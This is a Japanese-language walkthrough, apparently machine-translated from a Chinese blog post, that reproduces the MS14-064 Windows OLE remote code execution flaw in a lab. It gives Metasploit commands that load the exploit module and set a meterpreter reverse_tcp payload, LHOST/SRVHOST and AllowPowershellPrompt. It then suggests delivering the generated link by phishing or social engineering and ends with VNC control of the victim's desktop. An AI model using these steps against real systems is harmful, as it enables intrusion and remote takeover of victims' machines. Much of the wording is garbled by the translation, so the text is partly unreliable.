脆弱性の再現:MS14-064 OLEリモートでコードが実行される脆弱性


MS14-064OLEリモートでコードが実行される脆弱性

攻撃:2019カーリーのLinux

ドローン:Windows 7のx64の、x32の

攻撃手順:

1.攻撃機カーリーのLinux 2019のシステムとドローンのWindows 7システム

 

 2.テストを攻撃する準備ができて、IPアドレス、カーリーLinuxのオープンMSFモジュールを確認してください

 

 

3.ここでは、MS14-064OLE、リモートでコードが実行される脆弱性、MS14-064検索開始を使用

 

(MS14-064を検索)

 

 

 4.私たちは、使用/窓/ブラウザ/ ms14_064_ole_code_executionを悪用し、使用するモジュールを活用ロード

使用は/ウィンドウ/ブラウザ/ ms14_064_ole_code_executionエクスプロイト

 

 

 

 

詳細構成、具体的な構成の次のステップ

 

 6.構成ペイロード、SRVHOST LHOSTアドレスおよびペイロードにおける次のモジュールの開始アドレス

(ペイロード:設定ペイロードの窓/ meterpreter / reverse_tcp)

(LHOST住所:カーリーLinuxのIPアドレス)

(SRVHOST住所:カーリーLinuxのIPアドレス)

 

 7.ノートPowerShellの呼び出しを使用して付属していますMSFの脆弱性がEXPあるので、真偽の変更デフォルトに精通している必要があり、地図上の矢印の位置、EXPコードのみPowerShellのシステムのインストールの発効のMSFので、ここでは、Windows 7のシステムでテスト。

(命令:ALlowPowershellPrompt trueに設定)

 

 8.テストを活用入力し、URLリンクを生成します、または漁法でソーシャルエンジニアリングが制御を達成することができ、Win7のホストに到達しています

 

 

 

 

 

 

 

 9.抽出された権限は、完全な浸透は、リモートデスクトップコントロール、観察動作のデスクトップすることができ

(ファイル名を指定して実行VNC観測インターフェース)

 

 

おすすめ

転載: www.cnblogs.com/redHskb/p/11571396.html